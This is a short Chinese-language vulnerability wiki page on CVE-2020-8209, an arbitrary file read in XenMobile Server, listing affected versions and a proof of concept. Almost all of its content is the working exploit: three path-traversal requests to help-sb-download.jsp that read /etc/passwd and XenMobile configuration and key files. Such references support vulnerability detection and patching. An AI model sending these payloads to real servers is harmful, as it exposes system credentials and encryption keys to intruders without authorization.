menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right XenMobile chevron_right CVE-2020-8209 XenMobile 任意文件读取
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-8209 XenMobile 任意文件读取

    影响版本:

    • XenMobile Server < 10.12 RP2
    • XenMobile Server < 10.11 RP4
    • XenMobile Server < 10.10 RP6
    • XenMobile Server < 10.9 RP5

    POC:

    /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
    /jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
    /jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/security.properties

    @Andrey Medov